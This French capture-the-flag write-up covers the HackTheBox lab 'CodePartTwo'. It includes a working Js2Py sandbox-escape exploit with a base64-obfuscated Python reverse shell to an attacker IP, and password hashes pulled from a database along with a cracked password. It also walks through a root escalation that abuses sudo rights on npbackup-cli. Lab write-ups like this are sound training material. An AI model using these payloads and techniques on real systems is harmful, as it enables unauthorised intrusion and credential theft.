Aller au contenu
Camille Gr.

CodePartTwo

Code Part Two

Section intitulée « Code Part Two »

Dans cette room facile de la saison 9 de HackTheBox, nous allons exploiter des vulnérabilités connues et effectuer une escalade de privilège à cause de droits sudoers trop permissifs.

Port Enum

Section intitulée « Port Enum »

On commence par une énumération des ports qui révèle un port ssh et une application web sur le port 8000. l’application web utilise Gunicorn et est donc développée en python.

Fenêtre de terminal
nmap -sS -sV -T5 10.129.10.60 -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 12:35 CET
Nmap scan report for 10.129.10.60
Host is up (0.071s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Gunicorn 20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

Access

Section intitulée « Access »

Sur le port 8000, nous trouvons une application web dont on peut télécharger le code source. Egalement il est possible de créer un compte et d’exécuter du code javascript.

En analysant le code source, on voit que l’application utilise Js2Py, et cette librairie possède une CVE de type RCE connue.

Faille CVE-2024-39

Section intitulée « Faille CVE-2024-39 »

Nous allons utiliser un POC connu que nous allons adapter pour obtenir un reverse-shell :

Fenêtre de terminal
let cmd = "eval $(echo 'cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTAuMTAuMTUuMTY5IiwxMzM3KSk7W29zLmR1cDIocy5maWxlbm8oKSxmKWZvciBmIGluKDAsMSwyKV07cHR5LnNwYXduKCJiYXNoIikn' | base64 -d) "
let hacked, bymarve, n11
let getattr, obj


hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__


function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}


n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11

Récupération des credentials de Marco

Section intitulée « Récupération des credentials de Marco »

En obtenant un shell, nous ne sommes pas connecté comme un utilisateur connu. Nous allons donc essayer de se connecter avec un autre utilisateur. En enumérant les fichiers de l’application nous trouvons une base SQLLite3. En listant directement les strings de cette base nous obtenons des hash de mot de passe, notamment au format md5 :

Fenêtre de terminal
$ strings users.db


SQLite format 3
Wtablecode_snippetcode_snippet
CREATE TABLE code_snippet (
        id INTEGER NOT NULL,
        user_id INTEGER NOT NULL,
        code TEXT NOT NULL,
        PRIMARY KEY (id),
        FOREIGN KEY(user_id) REFERENCES user (id)
Ctableuseruser
CREATE TABLE user (
        id INTEGER NOT NULL,
        username VARCHAR(80) NOT NULL,
        password_hash VARCHAR(128) NOT NULL,
        PRIMARY KEY (id),
        UNIQUE (username)
indexsqlite_autoindex_user_1user
Mappa97588c0e2fa3a024876339e27aeb42e)
Mmarco649c9d65a206a75f5abe509fe128bce5
        marco

En utilisant crackstation, on obtient le mot de passe de l’utilisateur marco :

Donc on a les credentials suivant marco:sweetangelbabylove

Ces credentials sont réutilisés pour la connexion SSH de l’utilisateur.

Privilege Escalation

Section intitulée « Privilege Escalation »

Misconfiguration : droits sudo trop étendus

Section intitulée « Misconfiguration : droits sudo trop étendus »

Les droits sudo permettent à l’utilisateur marco d’exécuter la commande npbackup-cli comme root.

Fenêtre de terminal
sudo -l
Matching Defaults entries for marco on codeparttwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin


User marco may run the following commands on codeparttwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli
Fenêtre de terminal
$ sudo npbackup-cli --version
$ npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2026-01-25 13:00:00,220 :: INFO :: ExecTime = 0:00:00.007967, finished, state is: success.

dans npbackup-cli on voit que :

  • Nous avons besoin d’une nouvelle configuration de backup : on copie l’existante et on modife le dossier de backup (et la taille minimale du backup pour éviter les erreurs)
  • On lance un nouveau backup
  • on dump le fichier /root/root.txt qui contient le flag :
Fenêtre de terminal
$ sudo npbackup-cli -b -c newbackup.conf
2026-01-25 13:21:40,686 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2026-01-25 13:21:40,717 :: INFO :: Loaded config 09F15BEC in /home/marco/newbackup.conf
2026-01-25 13:21:40,728 :: INFO :: Searching for a backup newer than 1 day, 0:00:00 ago
2026-01-25 13:21:43,018 :: INFO :: Snapshots listed successfully
2026-01-25 13:21:43,020 :: INFO :: No recent backup found in repo default. Newest is from 2025-04-06 03:50:16.222832+00:00
2026-01-25 13:21:43,020 :: INFO :: Runner took 2.292039 seconds for has_recent_snapshot
2026-01-25 13:21:43,020 :: INFO :: Running backup of ['/root/'] to repo default
2026-01-25 13:21:44,117 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excluded_extensions
2026-01-25 13:21:44,117 :: ERROR :: Exclude file 'excludes/generic_excluded_extensions' not found
2026-01-25 13:21:44,117 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excludes
2026-01-25 13:21:44,117 :: ERROR :: Exclude file 'excludes/generic_excludes' not found
2026-01-25 13:21:44,117 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/windows_excludes
2026-01-25 13:21:44,118 :: ERROR :: Exclude file 'excludes/windows_excludes' not found
2026-01-25 13:21:44,118 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/linux_excludes
2026-01-25 13:21:44,118 :: ERROR :: Exclude file 'excludes/linux_excludes' not found
2026-01-25 13:21:44,118 :: WARNING :: Parameter --use-fs-snapshot was given, which is only compatible with Windows
no parent snapshot found, will read all files


Files:          15 new,     0 changed,     0 unmodified
Dirs:            8 new,     0 changed,     0 unmodified
Added to the repository: 190.609 KiB (39.887 KiB stored)


processed 15 files, 197.660 KiB in 0:00
snapshot 8b2ba9b1 saved
2026-01-25 13:21:45,217 :: INFO :: Backend finished with success
2026-01-25 13:21:45,220 :: INFO :: Processed 197.7 KiB of data
2026-01-25 13:21:45,221 :: ERROR :: Backup is smaller than configured minmium backup size
2026-01-25 13:21:45,221 :: ERROR :: Operation finished with failure
2026-01-25 13:21:45,221 :: INFO :: Runner took 4.49483 seconds for backup
2026-01-25 13:21:45,221 :: INFO :: Operation finished
2026-01-25 13:21:45,230 :: INFO :: ExecTime = 0:00:04.546287, finished, state is: errors.






$ sudo npbackup-cli -c newbackup.conf --dump /root/root.txt
00000000fl4g000000000